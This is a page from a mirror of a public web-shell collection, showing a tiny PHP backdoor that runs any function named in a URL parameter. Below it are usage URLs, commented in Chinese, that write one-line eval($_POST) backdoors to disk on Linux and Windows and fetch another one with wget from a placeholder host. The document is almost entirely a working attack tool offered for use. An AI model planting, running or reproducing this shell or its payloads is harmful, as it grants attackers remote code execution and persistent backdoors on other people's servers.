mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
15 lines
No EOL
581 B
Text
15 lines
No EOL
581 B
Text
<?php
|
|
$func = new ReflectionFunction($_GET[m]);
|
|
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
|
|
?>
|
|
|
|
|
|
|
|
http://xxx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
|
|
http://xx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
|
|
|
|
|
|
|
|
mu201405.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test11.php //在当前目录下面生成一句话马 for windows
|
|
|
|
news.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test11.php //当前目录下载一句话马 for linux |